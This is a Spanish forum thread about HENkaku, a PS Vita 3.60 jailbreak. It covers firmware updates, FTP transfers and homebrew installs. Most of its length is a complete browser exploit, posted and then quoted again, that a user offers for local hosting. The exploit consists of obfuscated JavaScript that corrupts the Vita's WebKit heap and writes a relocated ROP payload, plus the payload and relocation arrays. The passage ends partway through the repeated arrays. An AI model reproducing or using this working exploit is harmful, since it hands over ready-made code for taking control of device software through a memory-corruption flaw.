HENkaku Ensō: CFW Permanente para PSVita

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alfax está baneado hasta el 30/6/2020 12:13 por "troll"
jotax escribió:
jotaveve escribió:Hola, Si sony saca una actualizacion se podria actualizar a fw 3.60 vulnerable de alguna otra forma? yo la tengo 1.8 con urbanix tv y no quiero quedarme sin mi emuladores jajaaj

si, con QCMA puedes actualizar a un firmware especifico

hilo_tutorial-actualizar-a-un-firmware-especifico-con-qcma_2123175

Yo tb estoy con TNV pero en 3.18



incluso a uno anterior ?
SugarBaby escribió:Hola chicos! Lo que me pasa es que no me reconoce Filezilla la PSvita
Hago el tuyo, y tengo la IP que me muestra el programa 192.168.1.136:137
Quiere decir que se mueve entre la 136 y 137

Abro Filezilla, conecto mi PC por Wifi a la Misma red que la Psvita
Pongo la IP de la PSvita en la casilla Servidos y le doy a conexion rapida y jamas me conecta, llevo ahi como media hora probando

Alguien me ayuda por favor

137 o 1337?
alfax escribió:
jotax escribió:
jotaveve escribió:Hola, Si sony saca una actualizacion se podria actualizar a fw 3.60 vulnerable de alguna otra forma? yo la tengo 1.8 con urbanix tv y no quiero quedarme sin mi emuladores jajaaj

si, con QCMA puedes actualizar a un firmware especifico

hilo_tutorial-actualizar-a-un-firmware-especifico-con-qcma_2123175

Yo tb estoy con TNV pero en 3.18



incluso a uno anterior ?

No.
SugarBaby escribió:Hola chicos! Lo que me pasa es que no me reconoce Filezilla la PSvita
Hago el tuyo, y tengo la IP que me muestra el programa 192.168.1.136:137
Quiere decir que se mueve entre la 136 y 137

Abro Filezilla, conecto mi PC por Wifi a la Misma red que la Psvita
Pongo la IP de la PSvita en la casilla Servidos y le doy a conexion rapida y jamas me conecta, llevo ahi como media hora probando

Alguien me ayuda por favor



137 es el puerto, en filezilla pon la ip en el recuadro de servidor y el puerto en el recuadro de puerto

edit: el puerto en mi vita es 1337
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@pabloc Un millon de Gracias
Recomendais actualizar. Estoy en 3.51. Con ark
choca escribió:
SoteBcn escribió:
alfax escribió:supongo que hay algún link para descargar el 3.60 y tenerlo offline para actualizar cuando convenga ?


Si, puedes actualizar con QCMA cuando quieras

Y de donde se descarga? Interesa

Esta es 3.60 su
360eu
podeis decir como se instala? he abierto el navegador y he descargado la app henkaku y la tengo instalada en la psvita,me sale una burbuja "molecular shell" ..

ya esta? o tengo que hacer algo mas?
Venga, ¿quién es el primero que se atreve a subir las partidas guardadas a la nube? :Ð

draqen escribió:Recomendais actualizar. Estoy en 3.51. Con ark

Depende de lo que uses los juegos de PSP/PSone. Aquí por ahora no se puede pero los homebrews no se limitan al emulador de PSP. Por no hablar que podemos modificar el app.db XD

@LINKr2, mete una wiki en el primer post y la vamos actualizando entre todos [oki]
alfax escribió:
jotax escribió:
jotaveve escribió:Hola, Si sony saca una actualizacion se podria actualizar a fw 3.60 vulnerable de alguna otra forma? yo la tengo 1.8 con urbanix tv y no quiero quedarme sin mi emuladores jajaaj

si, con QCMA puedes actualizar a un firmware especifico

hilo_tutorial-actualizar-a-un-firmware-especifico-con-qcma_2123175

Yo tb estoy con TNV pero en 3.18



incluso a uno anterior ?

No, eso no, downgrade no hay. De momento, vete a saber
@Raúl DJ eso lo tengo yo justamente hecho en 3.52 desde hace eones y va bien, de hecho carga más juegos especiales como el Dengeki Bunko Fighting Climax que así lo puedes jugar con stick. Te ha dado algún problema la 3.60? Lo de tener que "instalar" cada vez es un coñazo, no sé si esperarme, aunque entonces me quedaría sin sincronizar los trofeos que llevan la tira ahí abandonaos en la consola xDDDD

¿Qué recomendáis? ¿Subir la Vita TV a 3.60 teniendo ya otra también en este firm, o seguir como ahora con una en 3.52 y otra en 3.60?

P.D.: en 3.52 con el hack el Wipeout se supone que funciona, de hecho hay videos en youtube.
largeroliker escribió:@LINKr2, mete una wiki en el primer post y la vamos actualizando entre todos [oki]


Voy! :)

EDIT: Wiki añadida al primer post! [beer]
¿Ya se puede instalar? ¿Hay alguna forma fácil de hacerlo?

En cuanto llegue a casa (por la tarde) me pongo, aunque no se en que versión tenía la PSVita.
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Nota de moderación:
EOL no da soporte a descargas ilegales.
Toma esto como aviso.
alfax está baneado hasta el 30/6/2020 12:13 por "troll"
alguien por favor que facilite el md5 del ofw 3.60, más que nada para estar seguros de lo que instalamos...

gracias
alfax escribió:alguien por favor que facilite el md5 del ofw 3.60, más que nada para estar seguros de lo que instalamos...

gracias

¿Y si bajas el firmware directo de la página oficial de Sony?, aunque no sé si sean diferentes entre las diferentes regiones.

Edit:
Ya verifiqué, los firmwares son diferente dependiendo de cada región, solo fijate que sea la tuya.
Como puedo mandar homebrews por filezila?
Porque le meto la ip que me sale en la molecularshell y no funciona :-?
alfax está baneado hasta el 30/6/2020 12:13 por "troll"
no me fio de nada que venga online, por eso he pedido el md5...
PEMANxd escribió:Como puedo mandar homebrews por filezila?
Porque le meto la ip que me sale en la molecularshell y no funciona :-?


Pon también el puerto (1337), que seguro que no lo has hecho ;)
AkrosRockBell escribió:@Raúl DJ eso lo tengo yo justamente hecho en 3.52 desde hace eones y va bien, de hecho carga más juegos especiales como el Dengeki Bunko Fighting Climax que así lo puedes jugar con stick. Te ha dado algún problema la 3.60? Lo de tener que "instalar" cada vez es un coñazo, no sé si esperarme, aunque entonces me quedaría sin sincronizar los trofeos que llevan la tira ahí abandonaos en la consola xDDDD


Creo que necesitaba Internet para algo en algún momento en la Vita TV y tuve que actualizarla antes de nada hace ya tiempo, así que me tuve que joder sin la lista desbloqueada hasta ahora. Con respecto a si dio problemas, pues conseguí instalar el rollo a la segunda creo, sólo reinicié una vez. Ahí ya simplemente lo abrí, puse el modo FTP y fiesta. Efectivamente si apagas y vuelves a encender ya no tira, pero ya ni lo instalé una segunda vez.

AkrosRockBell escribió:P.D.: en 3.52 con el hack el Wipeout se supone que funciona, de hecho hay videos en youtube.


Yo creo que había algún rollo en plan modificar uno de los archivos del icono de iniciar el juego para algunos juegos que se "resistían" a rular, pero ya no me acuerdo. De todas formas me da igual, sólo quiero que me tire el Ciel y tampoco es para ahora, sino para dentro probablemente varios meses [qmparto], así que esperemos que aguante conforme vayan actualizando la consola =_=...
alfax escribió:no me fio de nada que venga online, por eso he pedido el md5...

el link es el de sony, no creo que...

lo dejo de nuevo, es el que yo tengo

https://www.playstation.com/en-us/suppo ... s/ps-vita/
@jotax actualizo desde 3.51? Que opinas
@Raúl DJ lo que había era la inserción de código en la base de datos como has hecho para el Neptunia y ya que yo recuerde.

Por cierto, si apagas y vuelves a encender te restaura la base de datos o te mantiene la modificada? No sé si actualizar la vedad, pero me interesa, tú qué harias? Normalmente la Vita TV en 3.52 la llevo emparejada con la Vita normal ya que es la que más uso.
Wiki añadida, y añadida información básica sobre el Henkaku [oki]

Ya podéis añadir info todos!
Jaeharys escribió:Está todo aquí @juacons : https://henkaku.xyz/usage/

Pero básicamente.

1. Abres con el navegador la web de https://henkaku.xyz/
2. Pulsas en instalar (si da error tres veces seguidas, reiniciar la consola y probar de nuevo). Si funciona, se instalará y cerrará el navegador.
3. Abres la burbuja del Molecule.
4. Pulsas SELECT para activar el FTP.
5. Con la IP y el puerto que pone en la PSVita, utilizar un cliente FTP de PC (yo uso Filezilla) para conectar a ella.
6. Navegar hasta "ux0", que es la tarjeta de memoria. Ahí se pueden crear carpetas a placer y meter dentro de ellas los instaladores de los emuladores (han de ser en formato .vpk).
7. Una vez se han acabado de cargar en el cliente FTP los instaladores/roms/homebrew que se quieran, cerrar en la Vita el cliente pulsando CÍRCULO.
8. Ahora navegar hasta "ux0" en el Molecule e ir a la carpeta donde hemos subido los instaladores. Seleccionar uno e instalarlo pulsando X.
9. Cuando se ha acabado de instalar un vpk, aparece en el escritorio como una burbuja más.

Gracias Jaeharys, he añadido tu tutorial al Wiki, a la tarde a ver si me pongo y hacemos uno en condiciones. [oki]

Salu2!
Me cago en la leche, tenía todo el tutorial traducido y cuando he ido a grabarlo alguien había escrito ya y me lo ha mandado a tomar por culo [+risas]
alfax está baneado hasta el 30/6/2020 12:13 por "troll"
con un proxy no sería posible hacer el tema offline para no depender de la disponibilidad de ese sitio web ?
Los emuladores todavía están un poco verdes... de los que he probado petardea el sonido. A ver si la cosa avanza.
@largeroliker

Creo que estamos actualizando la Wiki varios a la vez y la estamos liando jaja, dejo de tocarla yo por ahora! Si vas atrás en el navegador tendrás tu versión!

Gracias por la ayuda @egarrote! :)
me da error de conexion en filezilla.. :( :(
@largeroliker Es que estamos editando tres el Wiki, prueba a darle para atrás a tu navegador y así recuperas el texto.
@LINKr2 De momento he dejado traducido todas las secciones, a la tarde le damos formato. [oki]

Salu2!
En el foro de wololo dicen que VHBL se puede ejecutar en HENkaku usando el método PBOOT, a ver si alguien lo prueba XD

se necesita un juego de PSP
descargar el pboot.pbp VHBL y abra la molécula shell
presiona select para iniciar ftp
ir a ux0-> pspemu-> PSP-> Juego-> game_id
enviar el pboot.pbp
transferir juego de psp a su psvita
draqen escribió:@jotax actualizo desde 3.51? Que opinas

Lo mas inteligente es esperar si ya se tiene un exploit de PSP, ya que actualmente funciona todo mejor y en mas cantidad, en dicho ePSP, ese es mi caso, y esperar a que se desarrolle todo esto un poco y quizá podamos cargar el exploit en firmwares menores y tb quizá de forma local.

Actualmente si tienes tiempo y quieres cacharrear y aprender cosas nuevas deberias, vas aprendiendote la estructura de archivos de la Vita...etc

Está escrito, esto no carga por ahora juegos de PSP ni PSX ni nada de ePSP y será dificil supongo, porque los Moléculos están ofreciendo un gran premio a quien consiga reversar este, su nuevo software.

PD- Creo que se esta actualizando el VitaShell, no se que llevará.

edito:
Toma ya!

el mGBA moléculo
Link
@jotax me a pasado una cosa curiosisima actualizo a 3.60 y lo tipico no me funciona ark ni psm plus unity, pero si me funciona la burbuja del gameboy advance jajajajajaj
@draqen Bueno saberlo :D

aqui el mGBA moléculo
Link
@jotax por cierto tengo acceso al mail.db igual podriamos restaurar el hack dl correo jajajajajaj
alfax escribió:con un proxy no sería posible hacer el tema offline para no depender de la disponibilidad de ese sitio web ?


aquí tienes el script que lanza el exploit... te lo puedes montar en local. Va todo en una línea. Es un fichero html con este único contenido. Otra cosa más que añadir a mi recopilación del broserhax de 3DS que quiero hacerme xD

Llamemosle index.html por ejemplo (este fichero html es el que hay que abrir con la vita)

<script src='payload.js'></script><script>var r,a,e,t,n,o,l,i,f,v,s,c;var u,y,w,p,d,g,h,k,b;var A,U;var m=64+payload[16/4];m/=4;var F=null;function D(r,a){if(!F)F=new DataView(new ArrayBuffer(16));F.setUint32(0,a);F.setUint32(4,r);return F.getFloat64(0)}function E(r){if(!F)F=new DataView(new ArrayBuffer(16));F.setFloat64(0,r);return{low:F.getUint32(4),hi:F.getUint32(0)}}var x=0;var L=0;var B=new Uint32Array(1024);function S(r){x=K[r/4];L=K[r/4+1];return((x&4095|(x&983040)>>4)&65535|((L&4095|(L&983040)>>4)&65535)<<16)>>>0}r=16384;a=new Array(r);e=new Array(r);t=4932;n=1717920867;o=1431655765;for(var V=0;V<e.length;++V){e[V]=new Uint32Array(t/4);var H=document.createElement("textarea");H.rows=n;a[V]=H}for(var V=0;V<1024;++V){var H=document.createElement("textarea");H.rows=n;a.push(H)}var N=12288;var W=Array.prototype.constructor.apply(null,new Array(N));var j=2048;var q=new Array(j);var z={};var C=new Array(256);z.toString=function(){W.push(12345);for(var r=0;r<C.length;++r){var a=Array.prototype.constructor.apply(null,q);a[0]=0;a[1]=1;a[2]=2;C[r]=a}return""};W[0]=z;var G=D(2147483648,2147483648);for(var V=1;V<8192;++V)W[V]=G;W.sort();contents="";cur=0;z.toString=function(){};var I=null;for(var V=0;V<C.length;++V){if(C[V].length!=j){I=C[V];break}}var J=536870912-69632;for(;;J--){if(I[J]!=0){F.setFloat64(0,I[J]);if(F.getUint32(0)==t/4){F.setUint32(0,4026531808);I[J]=F.getFloat64(0);F.setFloat64(0,I[J-2]);v=F.getUint32(4);F.setUint32(4,0);F.setUint32(0,2147483648);I[J-2]=F.getFloat64(0);break}}}l=null;for(var V=0;V<e.length;++V){if(e[V].byteLength!=t){l=e[V];break}}if(!l){alert("failed");while(1){}}var K=l;var M=v;f=v;for(var O=f/4;O<f/4+16384;++O){if(K[O]==n){K[O]=o;s=O*4;i=true;break}}if(!i){alert("Did not find Element signature");while(1){}}var P=false;var Q;for(var V=0;V<a.length;++V){if(a[V].rows==o){Q=a[V];P=true;break}}if(!P){alert("Did not find corrupted textarea");while(1){}}var R=s-112;var T=K[R/4];u=T-11253340;y=S(u+8779012)-64073;w=S(u+8778852)-36913;p=S(u+8770276)-142693;d=S(p+2910348)-2533;g=S(d+15300)-56365;h=S(u+8778772)-9197;k=S(g+101364)-3417;b=S(k+39608)-18893;for(var V=0;V<64;V++)K[M/4+V]=K[T/4+V];K[R/4]=M;for(var V=0;V<48;++V)B[V]=K[R/4+V];K[M/4+78]=y+82032|1;Q.scrollLeft=0;c=(K[R/4+8]^(K[R/4+9]^u+3242281)>>>0)>>>0;c-=981016;for(var V=0;V<48;++V)K[R/4+V]=B[V];A=c+64;U=c+65536;O=c/4;for(var V=0;V<payload.length;++V,++O){if(V==m)O=U/4;switch(relocs[V]){case 0:K[O]=payload[V];break;case 1:K[O]=payload[V]+A;break;case 2:K[O]=payload[V]+u;break;case 3:K[O]=payload[V]+w;break;case 4:K[O]=payload[V]+y;break;case 5:K[O]=payload[V]+g;break;case 6:K[O]=payload[V]+h;break;case 7:K[O]=payload[V]+b;break;default:alert("wtf?");alert(V+" "+relocs[V])}}K[M/4+78]=u+21704;var X=M+256;K[X/4+5]=U;K[X/4+6]=u+787594|1;alert("Welcome to HENkaku!");Q.scrollLeft=X;alert("that's it");</script>


Además, tienes que tener en la misma ruta que el fichero HTML otro fichero llamado payload.js con el contenido siguiente


payload = [2119192402,65537,0,0,1840,0,0,0,1016,0,787595,0,1512,0,56,0,0,4294967295,0,0,4294967295,0,0,4294967295,0,0,4294967295,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1886680168,1731145530,1701326447,1801546606,2037919349,7876474,0,0,3306611,0,0,1026646335,30757,0,1026711846,1629911077,2015706419,1026842918,2521125,0,0,1026908454,1629911077,2015706422,1027039526,2521125,0,0,7496812,0,9316293,64,40,1077189,84601,0,787595,787595,9296309,255,1008,40,0,26460,0,1035707,0,787595,9316293,440,1272,1077189,84601,0,787595,787595,9335877,1092,1272,431537,26476,1035707,0,787595,9296309,1752,21704,268435712,6291456,44233,0,785297,0,0,0,787595,8999557,4,1077189,84601,0,787595,9316293,124,52,1077189,84601,0,787595,787595,9335877,4,52,431537,42897,1035707,0,787595,9335877,104,4096,431537,1247765,1035707,0,787595,8999557,28,1077189,84601,0,787595,9316293,188,1720,26485,84601,0,787595,787595,9296309,28,0,9316293,0,0,1035707,431537,26045,2204309,708,256,1764,1860711,0,787595,9316293,188,708,26485,84601,0,787595,787595,9296309,708,256,1776,0,26045,0,785297,0,0,0,787595,9316293,188,708,26485,84601,0,787595,787595,9296309,708,256,1804,0,26045,0,785297,0,0,0,787595,9316293,188,708,26485,84601,0,787595,787595,9550269,65536,37629,1035707,0,787595,9296309,1832,2,1,0,38011,0,1035707,0,787595,9289173,188,0,38155,1074781,0,787595,787595,8783415,0,188,0,38399,785297,0,0,0,787595,8999557,16,1077189,84601,0,787595,9316293,16,0,0,431537,39221,1035707,0,787595,787595,8932229,6291456,9597461,28,432379,0,9597461,16,431537,39299,1035707,0,787595,787595,9335877,28,992,431537,1077189,1035707,0,787595,9316293,787595,996,1077189,84601,0,787595,787595,9316293,4,28,972,431537,42889,1035707,0,787595,787595,9316293,4,0,0,431537,5885,1035707,0,787595,787595];
relocs = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,1,2,2,0,2,2,2,0,1,1,0,3,0,2,0,2,2,0,1,2,2,0,2,2,2,1,1,2,3,2,0,2,2,1,2,0,0,3,0,2,0,0,0,2,2,1,2,2,0,2,2,0,1,2,2,0,2,2,2,1,1,2,3,2,0,2,2,1,0,2,2,2,0,2,2,1,2,2,0,2,2,1,1,4,2,0,2,2,2,1,0,2,0,0,2,2,4,2,1,0,1,2,0,2,2,1,1,4,2,0,2,2,2,1,0,1,2,4,0,2,3,4,0,2,2,1,1,4,2,0,2,2,2,1,0,1,5,4,0,2,6,7,0,2,2,1,1,4,2,0,2,2,2,0,5,2,0,2,2,1,0,0,0,5,0,2,0,2,2,1,0,5,2,0,2,2,2,0,1,0,5,2,0,0,0,2,2,1,2,2,0,2,2,1,0,0,2,5,2,0,2,2,2,0,2,1,2,0,2,1,2,5,2,0,2,2,2,1,1,2,2,2,0,2,2,2,1,2,2,0,2,2,2,1,0,1,2,3,2,0,2,2,2,1,0,0,2,3,2,0,2,2];
c0d3m4st4 escribió:
alfax escribió:con un proxy no sería posible hacer el tema offline para no depender de la disponibilidad de ese sitio web ?


aquí tienes el script que lanza el exploit... te lo puedes montar en local. Va todo en una línea. Es un fichero html con este único contenido. Otra cosa más que añadir a mi recopilación del broserhax de 3DS que quiero hacerme xD

Llamemosle index.html por ejemplo
<script src='payload.js'></script><script>var r,a,e,t,n,o,l,i,f,v,s,c;var u,y,w,p,d,g,h,k,b;var A,U;var m=64+payload[16/4];m/=4;var F=null;function D(r,a){if(!F)F=new DataView(new ArrayBuffer(16));F.setUint32(0,a);F.setUint32(4,r);return F.getFloat64(0)}function E(r){if(!F)F=new DataView(new ArrayBuffer(16));F.setFloat64(0,r);return{low:F.getUint32(4),hi:F.getUint32(0)}}var x=0;var L=0;var B=new Uint32Array(1024);function S(r){x=K[r/4];L=K[r/4+1];return((x&4095|(x&983040)>>4)&65535|((L&4095|(L&983040)>>4)&65535)<<16)>>>0}r=16384;a=new Array(r);e=new Array(r);t=4932;n=1717920867;o=1431655765;for(var V=0;V<e.length;++V){e[V]=new Uint32Array(t/4);var H=document.createElement("textarea");H.rows=n;a[V]=H}for(var V=0;V<1024;++V){var H=document.createElement("textarea");H.rows=n;a.push(H)}var N=12288;var W=Array.prototype.constructor.apply(null,new Array(N));var j=2048;var q=new Array(j);var z={};var C=new Array(256);z.toString=function(){W.push(12345);for(var r=0;r<C.length;++r){var a=Array.prototype.constructor.apply(null,q);a[0]=0;a[1]=1;a[2]=2;C[r]=a}return""};W[0]=z;var G=D(2147483648,2147483648);for(var V=1;V<8192;++V)W[V]=G;W.sort();contents="";cur=0;z.toString=function(){};var I=null;for(var V=0;V<C.length;++V){if(C[V].length!=j){I=C[V];break}}var J=536870912-69632;for(;;J--){if(I[J]!=0){F.setFloat64(0,I[J]);if(F.getUint32(0)==t/4){F.setUint32(0,4026531808);I[J]=F.getFloat64(0);F.setFloat64(0,I[J-2]);v=F.getUint32(4);F.setUint32(4,0);F.setUint32(0,2147483648);I[J-2]=F.getFloat64(0);break}}}l=null;for(var V=0;V<e.length;++V){if(e[V].byteLength!=t){l=e[V];break}}if(!l){alert("failed");while(1){}}var K=l;var M=v;f=v;for(var O=f/4;O<f/4+16384;++O){if(K[O]==n){K[O]=o;s=O*4;i=true;break}}if(!i){alert("Did not find Element signature");while(1){}}var P=false;var Q;for(var V=0;V<a.length;++V){if(a[V].rows==o){Q=a[V];P=true;break}}if(!P){alert("Did not find corrupted textarea");while(1){}}var R=s-112;var T=K[R/4];u=T-11253340;y=S(u+8779012)-64073;w=S(u+8778852)-36913;p=S(u+8770276)-142693;d=S(p+2910348)-2533;g=S(d+15300)-56365;h=S(u+8778772)-9197;k=S(g+101364)-3417;b=S(k+39608)-18893;for(var V=0;V<64;V++)K[M/4+V]=K[T/4+V];K[R/4]=M;for(var V=0;V<48;++V)B[V]=K[R/4+V];K[M/4+78]=y+82032|1;Q.scrollLeft=0;c=(K[R/4+8]^(K[R/4+9]^u+3242281)>>>0)>>>0;c-=981016;for(var V=0;V<48;++V)K[R/4+V]=B[V];A=c+64;U=c+65536;O=c/4;for(var V=0;V<payload.length;++V,++O){if(V==m)O=U/4;switch(relocs[V]){case 0:K[O]=payload[V];break;case 1:K[O]=payload[V]+A;break;case 2:K[O]=payload[V]+u;break;case 3:K[O]=payload[V]+w;break;case 4:K[O]=payload[V]+y;break;case 5:K[O]=payload[V]+g;break;case 6:K[O]=payload[V]+h;break;case 7:K[O]=payload[V]+b;break;default:alert("wtf?");alert(V+" "+relocs[V])}}K[M/4+78]=u+21704;var X=M+256;K[X/4+5]=U;K[X/4+6]=u+787594|1;alert("Welcome to HENkaku!");Q.scrollLeft=X;alert("that's it");</script>


Además, tienes que tener en la misma ruta que el fichero HTML otro fichero llamado payload.js con el contenido siguiente


payload = [2119192402,65537,0,0,1840,0,0,0,1016,0,787595,0,1512,0,56,0,0,4294967295,0,0,4294967295,0,0,4294967295,0,0,4294967295,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1886680168,1731145530,1701326447,1801546606,2037919349,7876474,0,0,3306611,0,0,1026646335,30757,0,1026711846,1629911077,2015706419,1026842918,2521125,0,0,1026908454,1629911077,2015706422,1027039526,2521125,0,0,7496812,0,9316293,64,40,1077189,84601,0,787595,787595,9296309,255,1008,40,0,26460,0,1035707,0,787595,9316293,440,1272,1077189,84601,0,787595,787595,9335877,1092,1272,431537,26476,1035707,0,787595,9296309,1752,21704,268435712,6291456,44233,0,785297,0,0,0,787595,8999557,4,1077189,84601,0,787595,9316293,124,52,1077189,84601,0,787595,787595,9335877,4,52,431537,42897,1035707,0,787595,9335877,104,4096,431537,1247765,1035707,0,787595,8999557,28,1077189,84601,0,787595,9316293,188,1720,26485,84601,0,787595,787595,9296309,28,0,9316293,0,0,1035707,431537,26045,2204309,708,256,1764,1860711,0,787595,9316293,188,708,26485,84601,0,787595,787595,9296309,708,256,1776,0,26045,0,785297,0,0,0,787595,9316293,188,708,26485,84601,0,787595,787595,9296309,708,256,1804,0,26045,0,785297,0,0,0,787595,9316293,188,708,26485,84601,0,787595,787595,9550269,65536,37629,1035707,0,787595,9296309,1832,2,1,0,38011,0,1035707,0,787595,9289173,188,0,38155,1074781,0,787595,787595,8783415,0,188,0,38399,785297,0,0,0,787595,8999557,16,1077189,84601,0,787595,9316293,16,0,0,431537,39221,1035707,0,787595,787595,8932229,6291456,9597461,28,432379,0,9597461,16,431537,39299,1035707,0,787595,787595,9335877,28,992,431537,1077189,1035707,0,787595,9316293,787595,996,1077189,84601,0,787595,787595,9316293,4,28,972,431537,42889,1035707,0,787595,787595,9316293,4,0,0,431537,5885,1035707,0,787595,787595];
relocs = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,1,2,2,0,2,2,2,0,1,1,0,3,0,2,0,2,2,0,1,2,2,0,2,2,2,1,1,2,3,2,0,2,2,1,2,0,0,3,0,2,0,0,0,2,2,1,2,2,0,2,2,0,1,2,2,0,2,2,2,1,1,2,3,2,0,2,2,1,0,2,2,2,0,2,2,1,2,2,0,2,2,1,1,4,2,0,2,2,2,1,0,2,0,0,2,2,4,2,1,0,1,2,0,2,2,1,1,4,2,0,2,2,2,1,0,1,2,4,0,2,3,4,0